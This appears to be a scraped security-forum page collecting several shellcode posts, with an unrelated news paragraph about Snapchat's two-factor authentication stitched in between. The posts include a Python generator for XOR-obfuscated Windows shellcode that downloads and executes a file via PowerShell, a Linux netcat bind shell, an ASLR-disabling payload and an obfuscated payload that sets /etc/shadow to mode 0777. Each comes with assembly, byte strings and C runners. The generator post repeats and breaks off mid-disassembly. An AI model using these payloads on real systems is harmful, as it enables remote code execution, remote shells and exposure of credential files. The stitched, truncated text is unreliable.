Search the Community

#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator #length: Dynamic ! depend on url and filename #Date: 20 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate #WinExec => 0x77b1e695 #ExitProcess => 0x77ae2acf #==================================== #Execute : #powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe" #==================================== #Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] #Thanks to my friends , Dariush Nasirpour and Ehsan Nezami #################################################### #How it work ? ''' C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py" Enter url Example: http://z3r0d4y.com/file.exe Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe Enter filename Example: D:\file.exe Enter:C:\Ali.exe C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: 68 41 41 65 22 push $0x22654141 8: 58 pop %eax 9: c1 e8 08 shr $0x8,%eax c: c1 e8 08 shr $0x8,%eax f: 50 push %eax 10: b8 34 47 0b 4d mov $0x4d0b4734,%eax 15: bb 5d 69 6e 35 mov $0x356e695d,%ebx 1a: 31 d8 xor %ebx,%eax 1c: 50 push %eax 1d: b8 43 32 10 22 mov $0x22103243,%eax 22: bb 79 6e 51 4e mov $0x4e516e79,%ebx 27: 31 d8 xor %ebx,%eax 29: 50 push %eax 2a: b8 60 05 42 32 mov $0x32420560,%eax 2f: bb 49 78 79 71 mov $0x71797849,%ebx 34: 31 d8 xor %ebx,%eax 36: 50 push %eax 37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax 3c: bb 6a 64 49 33 mov $0x3349646a,%ebx 41: 31 d8 xor %ebx,%eax 43: 50 push %eax 44: b8 07 3e 0b 40 mov $0x400b3e07,%eax 49: bb 46 52 62 6e mov $0x6e625246,%ebx 4e: 31 d8 xor %ebx,%eax 50: 50 push %eax 51: b8 44 0a 78 07 mov $0x7780a44,%eax 56: bb 63 49 42 5b mov $0x5b424963,%ebx 5b: 31 d8 xor %ebx,%eax 5d: 50 push %eax 5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax 63: bb 6a 31 67 2d mov $0x2d67316a,%ebx 68: 31 d8 xor %ebx,%eax 6a: 50 push %eax 6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax 70: bb 61 4c 39 67 mov $0x67394c61,%ebx 75: 31 d8 xor %ebx,%eax 77: 50 push %eax 78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax 7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx 82: 31 d8 xor %ebx,%eax 84: 50 push %eax 85: b8 45 40 41 66 mov $0x66414045,%eax 8a: bb 3d 78 77 49 mov $0x4977783d,%ebx 8f: 31 d8 xor %ebx,%eax 91: 50 push %eax 92: b8 02 1f 4b 45 mov $0x454b1f02,%eax 97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx 9c: 31 d8 xor %ebx,%eax 9e: 50 push %eax 9f: b8 24 3e 19 32 mov $0x32193e24,%eax a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx a9: 31 d8 xor %ebx,%eax ab: 50 push %eax ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx b6: 31 d8 xor %ebx,%eax b8: 50 push %eax b9: b8 1f 37 40 24 mov $0x2440371f,%eax be: bb 6d 52 32 41 mov $0x4132526d,%ebx c3: 31 d8 xor %ebx,%eax c5: 50 push %eax c6: b8 2e 35 68 31 mov $0x3168352e,%eax cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx d0: 31 d8 xor %ebx,%eax d2: 50 push %eax d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax d8: bb 67 6e 69 61 mov $0x61696e67,%ebx dd: 31 d8 xor %ebx,%eax df: 50 push %eax e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax e5: bb 4f 45 62 33 mov $0x3362454f,%ebx ea: 31 d8 xor %ebx,%eax ec: 50 push %eax ed: b8 20 57 1d 45 mov $0x451d5720,%eax f2: bb 47 78 63 36 mov $0x36637847,%ebx f7: 31 d8 xor %ebx,%eax f9: 50 push %eax fa: b8 04 6a 24 3b mov $0x3b246a04,%eax ff: bb 77 44 4b 49 mov $0x494b4477,%ebx 104: 31 d8 xor %ebx,%eax 106: 50 push %eax 107: b8 18 0f 0a 32 mov $0x320a0f18,%eax 10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx 111: 31 d8 xor %ebx,%eax 113: 50 push %eax 114: b8 7d 18 3c 27 mov $0x273c187d,%eax 119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx 11e: 31 d8 xor %ebx,%eax 120: 50 push %eax 121: b8 03 44 60 60 mov $0x60604403,%eax 126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx 12b: 31 d8 xor %ebx,%eax 12d: 50 push %eax 12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax 133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx 138: 31 d8 xor %ebx,%eax 13a: 50 push %eax 13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax 140: bb 6c 37 47 45 mov $0x4547376c,%ebx 145: 31 d8 xor %ebx,%eax 147: 50 push %eax 148: b8 59 07 12 0e mov $0xe120759,%eax 14d: bb 35 68 73 6a mov $0x6a736835,%ebx 152: 31 d8 xor %ebx,%eax 154: 50 push %eax 155: b8 01 59 11 2c mov $0x2c115901,%eax 15a: bb 45 36 66 42 mov $0x42663645,%ebx 15f: 31 d8 xor %ebx,%eax 161: 50 push %eax 162: b8 22 22 4e 5a mov $0x5a4e2222,%eax 167: bb 4c 56 67 74 mov $0x7467564c,%ebx 16c: 31 d8 xor %ebx,%eax 16e: 50 push %eax 16f: b8 00 37 1b 48 mov $0x481b3700,%eax 174: bb 43 5b 72 2d mov $0x2d725b43,%ebx 179: 31 d8 xor %ebx,%eax 17b: 50 push %eax 17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax 181: bb 64 48 47 71 mov $0x71474864,%ebx 186: 31 d8 xor %ebx,%eax 188: 50 push %eax 189: b8 6a 23 03 18 mov $0x1803236a,%eax 18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx 193: 31 d8 xor %ebx,%eax 195: 50 push %eax 196: b8 2d 54 57 1c mov $0x1c57542d,%eax 19b: bb 47 31 34 68 mov $0x68343147,%ebx 1a0: 31 d8 xor %ebx,%eax 1a2: 50 push %eax 1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax 1a8: bb 39 38 79 38 mov $0x38793839,%ebx 1ad: 31 d8 xor %ebx,%eax 1af: 50 push %eax 1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax 1b5: bb 79 57 51 61 mov $0x61515779,%ebx 1ba: 31 d8 xor %ebx,%eax 1bc: 50 push %eax 1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax 1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx 1c7: 31 d8 xor %ebx,%eax 1c9: 50 push %eax 1ca: b8 2c 18 08 54 mov $0x5408182c,%eax 1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx 1d4: 31 d8 xor %ebx,%eax 1d6: 50 push %eax 1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax 1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx 1e1: 31 d8 xor %ebx,%eax 1e3: 50 push %eax 1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax 1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx 1ee: 31 d8 xor %ebx,%eax 1f0: 50 push %eax 1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax 1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx 1fb: 31 d8 xor %ebx,%eax 1fd: 50 push %eax 1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax 203: bb 39 44 61 4f mov $0x4f614439,%ebx 208: 31 d8 xor %ebx,%eax 20a: 50 push %eax 20b: 89 e0 mov %esp,%eax 20d: bb 41 41 41 01 mov $0x1414141,%ebx 212: c1 eb 08 shr $0x8,%ebx 215: c1 eb 08 shr $0x8,%ebx 218: c1 eb 08 shr $0x8,%ebx 21b: 53 push %ebx 21c: 50 push %eax 21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx 222: ff d3 call *%ebx 224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx 229: ff d3 call *%ebx C:\Users\Ali\Desktop> #you have your shellcode now ======================================= shellcode.c #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b?\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31?\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14?\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8?\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb?\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50?\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d?\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8?\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73?\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e?\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69?\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57?\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49?\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c?\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31?\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20?\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8?\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb?\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50?\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a?\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8?\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57?\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c?\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35?\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e?\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f?\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53?\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } ======================================= C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe C:\Users\Ali\Desktop>shellcode.exe Length: 173 C:\Users\Ali\Desktop> #notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second ''' import random,binascii chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-' p1 = '''xor eax,eax push eax ''' p2 = ''' mov eax,esp mov ebx,0x01414141 shr ebx,0x08 shr ebx,0x08 shr ebx,0x08 push ebx push eax mov ebx,0x77b1e695 call ebx mov ebx,0x77ae2acf call ebx ''' sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:')) sen1 = sen1.rsplit() sen1 = sen1[0] sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:')) sen2 = sen2.rsplit() sen2 = sen2[0] sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2) m = 0 for word in sen: m += 1 m = m - 1 stack = '' while(m>=0): stack += sen[m] m -= 1 stack = stack.encode('hex') skip = 1 if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if len(stack) % 8 == 0: zxzxzxz = 0 m = len(stack) / 8 c = 0 n = 0 z = 8 shf = open('shellcode.asm','w') shf.write(p1) shf.close() shf = open('shellcode.asm','a') while(c<m): v = 'push 0x' + stack[n:z] skip = 0 if '0x000000' in v: skip = 1 q1 = v[13:] v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x0000' in v: skip = 1 q1 = v[11:] v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x00' in v: skip = 1 q1 = v[9:] v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n' if skip is 1: shf.write(v) if skip is 0: v = v.rsplit() zzz = '' for w in v: if '0x' in w: zzz = str(w) s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4))) s1 = '0x%s'%s1 data = "%x" % (int(zzz, 16) ^ int(s1, 16)) v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1) shf.write(v) n += 8 z += 8 c += 1 shf.write(p2) shf.close()

Snapchat has deployed two factor authentication as part of its push to increase security across the popular selfie slinging app. The sexting swap shop allows users to set up SMS log-in verification that makes en-masse account hijacking more difficult, and better protects Snapchat's Snapcash money transfer system. The additional security measures are welcome, but devoted targeted attackers can still break into accounts by exploiting telecommunications providers' weak security identity checks to port phone numbers. Users of Snapchat version 9.9 will be able to activate the Login Verification feature on Android and iOS platforms. The extra security features are the latest efforts in a push to increase the platform's security chops which includes the launch of a HackerOne bug bounty, a regular transparency report, and the hiring of former Google social network security boss Jad Boutros as infosec head. Boutros has already said he aimsto build a "culture of security" at the company. The push follows Snapchat's legal trouble with the Federal Trade Commission stemming from incorrect claims photos and videos would "disappear forever" when it had remained on devices. The company also ran into trouble when some 4.6 million names and email addresses were breached in December 2013 after it dismissed that attack vector as theoretical. Source

/* # Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode # This shellcode will listen on port 17771 and give you /bin/sh # Shellcode Author: Oleg Boytsev # Tested on: Debian GNU/Linux 7/i686 # Shellcode Length: 58 # Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode global _start section .text _start: xor eax, eax xor edx, edx push eax push 0x31373737 ;-vp17771 push 0x3170762d mov esi, esp push eax push 0x68732f2f ;-le//bin//sh push 0x6e69622f push 0x2f656c2d mov edi, esp push eax push 0x636e2f2f ;/bin//nc push 0x6e69622f mov ebx, esp push edx push esi push edi push ebx mov ecx, esp mov al,11 int 0x80 */ #include<stdio.h> #include<string.h> unsigned char shellcode[] = "\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; main() { printf("Shellcode Length: %d\n",strlen(shellcode)); int (*ret)() = (int(*)())shellcode; ret(); } Source

/* #[+] Author: TUNISIAN CYBER #[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes) #[+] Date: 15-04-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp 32bit SP3 #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Credits: steve hanna projectshellcode.com ============================= Assembly: ;create.asm [Section .text] BITS 32 global _start _start: jmp short GetCommand CommandReturn: pop ebx xor eax,eax push eax push ebx mov ebx,0x7c8623ad call ebx xor eax,eax push eax mov ebx, 0x7c81cafa call ebx GetCommand: call CommandReturn db "cmd.exe /C echo shellcode by tunisian cyber >file.txt" db 0x00 ============================= */ char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff" "\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78" "\x65\x20\x2f\x43\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79" "\x20\x74\x75\x6e\x69\x73\x69\x61\x6e\x20\x63\x79\x62\x65\x72\x20\x3e\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"; int main(int argc, char **argv){int (*f)();f = (int ())shellcode;(int)(*f)();} Source

/* #Title: Disable ASLR in Linux (less byte and more compact) #Length: 84 bytes #Date: 3 April 2015 #Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+) #Tested On: kali-linux-1.0.6-i386 Thanks to stackoverflow section .text global _start _start: jmp short fileaddress shellcode: pop ebx xor eax,eax mov byte [ebx + 35],al push byte 5 pop eax push byte 2 pop ecx int 80h mov ebx, eax push byte 4 pop eax jmp short output cont: pop ecx push byte 2 pop edx int 80h push byte 1 pop eax xor ebx, ebx int 80h fileaddress: call shellcode db '/proc/sys/kernel/randomize_va_spaceX' output: call cont db '0',10 */ char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58" "\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a \xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70 \x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72 \x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63 \x65\x58\xe8\xc5\xff\xff\xff\x30\x0a"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Source

/* * Linux x86 - execve chmod 0777 /etc/shadow * Obfuscated version - 84 bytes * Original: http://shell-storm.org/shellcode/files/shellcode-828.php * Author: xmgv * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ */ /* global _start section .text _start: sub edx, edx push edx mov eax, 0xb33fb33f sub eax, 0x3bd04ede push eax jmp short two end: int 0x80 four: push edx push esi push ebp push ebx mov ecx, esp push byte 0xc pop eax dec eax jmp short end three: push edx sub eax, 0x2c3d2dff push eax mov ebp, esp push edx add eax, 0x2d383638 push eax sub eax, 0x013ffeff push eax sub eax, 0x3217d6d2 add eax, 0x31179798 push eax mov ebx, esp jmp short four two: sub eax, 0x0efc3532 push eax sub eax, 0x04feca01 inc eax push eax mov esi, esp jmp short three */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80" "\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c" "\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2" "\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e" "\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }

#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [use PowerShell] - Generator#length: Dynamic ! depend on url and filename #Date: 20 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate #WinExec => 0x77b1e695 #ExitProcess => 0x77ae2acf #==================================== #Execute : #powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe" #==================================== #Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] #Thanks to my friends , Dariush Nasirpour and Ehsan Nezami #################################################### #How it work ? ''' C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py" Enter url Example: http://z3r0d4y.com/file.exe Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe Enter filename Example: D:\file.exe Enter:C:\Ali.exe C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: 68 41 41 65 22 push $0x22654141 8: 58 pop %eax 9: c1 e8 08 shr $0x8,%eax c: c1 e8 08 shr $0x8,%eax f: 50 push %eax 10: b8 34 47 0b 4d mov $0x4d0b4734,%eax 15: bb 5d 69 6e 35 mov $0x356e695d,%ebx 1a: 31 d8 xor %ebx,%eax 1c: 50 push %eax 1d: b8 43 32 10 22 mov $0x22103243,%eax 22: bb 79 6e 51 4e mov $0x4e516e79,%ebx 27: 31 d8 xor %ebx,%eax 29: 50 push %eax 2a: b8 60 05 42 32 mov $0x32420560,%eax 2f: bb 49 78 79 71 mov $0x71797849,%ebx 34: 31 d8 xor %ebx,%eax 36: 50 push %eax 37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax 3c: bb 6a 64 49 33 mov $0x3349646a,%ebx 41: 31 d8 xor %ebx,%eax 43: 50 push %eax 44: b8 07 3e 0b 40 mov $0x400b3e07,%eax 49: bb 46 52 62 6e mov $0x6e625246,%ebx 4e: 31 d8 xor %ebx,%eax 50: 50 push %eax 51: b8 44 0a 78 07 mov $0x7780a44,%eax 56: bb 63 49 42 5b mov $0x5b424963,%ebx 5b: 31 d8 xor %ebx,%eax 5d: 50 push %eax 5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax 63: bb 6a 31 67 2d mov $0x2d67316a,%ebx 68: 31 d8 xor %ebx,%eax 6a: 50 push %eax 6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax 70: bb 61 4c 39 67 mov $0x67394c61,%ebx 75: 31 d8 xor %ebx,%eax 77: 50 push %eax 78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax 7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx 82: 31 d8 xor %ebx,%eax 84: 50 push %eax 85: b8 45 40 41 66 mov $0x66414045,%eax 8a: bb 3d 78 77 49 mov $0x4977783d,%ebx 8f: 31 d8 xor %ebx,%eax 91: 50 push %eax 92: b8 02 1f 4b 45 mov $0x454b1f02,%eax 97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx 9c: 31 d8 xor %ebx,%eax 9e: 50 push %eax 9f: b8 24 3e 19 32 mov $0x32193e24,%eax a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx a9: 31 d8 xor %ebx,%eax ab: 50 push %eax ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx b6: 31 d8 xor %ebx,%eax b8: 50 push %eax b9: b8 1f 37 40 24 mov $0x2440371f,%eax be: bb 6d 52 32 41 mov $0x4132526d,%ebx c3: 31 d8 xor %ebx,%eax c5: 50 push %eax c6: b8 2e 35 68 31 mov $0x3168352e,%eax cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx d0: 31 d8 xor %ebx,%eax d2: 50 push %eax d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax d8: bb 67 6e 69 61 mov $0x61696e67,%ebx dd: 31 d8 xor %ebx,%eax df: 50 push %eax e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax e5: bb 4f 45 62 33 mov $0x3362454f,%ebx ea: 31 d8 xor %ebx,%eax ec: 50 push %eax ed: b8 20 57 1d 45 mov $0x451d5720,%eax f2: bb 47 78 63 36 mov $0x36637847,%ebx f7: 31 d8 xor %ebx,%eax f9: 50 push %eax fa: b8 04 6a 24 3b mov $0x3b246a04,%eax ff: bb 77 44 4b 49 mov $0x494b4477,%ebx 104: 31 d8 xor %ebx,%eax 106: 50 push %eax 107: b8 18 0f 0a 32 mov $0x320a0f18,%eax 10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx 111: 31 d8 xor %ebx,%eax 113: 50 push %eax 114: b8 7d 18 3c 27 mov $0x273c187d,%eax 119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx 11e: 31 d8 xor %ebx,%eax 120: 50 push %eax 121: b8 03 44 60 60 mov $0x60604403,%eax 126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx 12b: 31 d8 xor %ebx,%eax 12d: 50 push %eax 12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax 133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx 138: 31 d8 xor %ebx,%eax 13a: 50 push %eax 13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax 140: bb 6c 37 47 45 mov $0x4547376c,%ebx 145: 31 d8 xor %ebx,%eax 147: 50 push %eax 148: b8 59 07 12 0e mov $0xe120759,%eax 14d: bb 35 68 73 6a mov $0x6a736835,%ebx 152: 31 d8 xor %ebx,%eax 154: 50 push %eax 155: b8 01 59 11 2c mov $0x2c115901,%eax 15a: bb 45 36 66 42 mov $0x42663645,%ebx 15f: 31 d8 xor %ebx,%eax 161: 50 push %eax 162: b8 22 22 4e 5a mov $0x5a4e2222,%eax 167: bb 4c 56 67 74 mov $0x7467564c,%ebx 16c: 31 d8 xor %ebx,%eax 16e: 50 push %eax 16f: b8 00 37 1b 48 mov $0x481b3700,%eax 174: bb 43 5b 72 2d mov $0x2d725b43,%ebx 179: 31 d8 xor %ebx,%eax 17b: 50 push %eax 17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax 181: bb 64 48 47 71 mov $0x71474864,%ebx 186: 31 d8 xor %ebx,%eax 188: 50 push %eax 189: b8 6a 23 03 18 mov $0x1803236a,%eax 18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx 193: 31 d8 xor %ebx,%eax 195: 50 push %eax 196: b8 2d 54 57 1c mov $0x1c57542d,%eax 19b: bb 47 31 34 68 mov $0x68343147,%ebx 1a0: 31 d8 xor %ebx,%eax 1a2: 50 push %eax 1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax 1a8: bb 39 38 79 38 mov $0x38793839,%ebx 1ad: 31 d8 xor %ebx,%eax 1af: 50 push %eax 1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax 1b5: bb 79 57 51 61 mov $0x61515779,%ebx 1ba: 31 d8 xor %ebx,%eax 1bc: 50 push %eax 1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax 1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx 1c7: 31 d8 xor %ebx,%eax 1c9: 50 push %eax 1ca: b8 2c 18 08 54 mov $0x5408182c,%eax 1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx 1d4: 31 d8 xor %ebx,%eax 1d6: 50 push %eax 1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax 1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx 1e1: 31 d8 xor %ebx,%eax 1e3: 50 push %eax 1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax 1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx 1ee: 31 d8 xor %ebx,%eax 1f0: 50 push %eax 1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax 1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx 1fb: 31 d8 xor %ebx,%eax 1fd: 50 push %eax 1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax 203: bb 39 44 61 4f mov $0x4f614439,%ebx 208: 31 d8 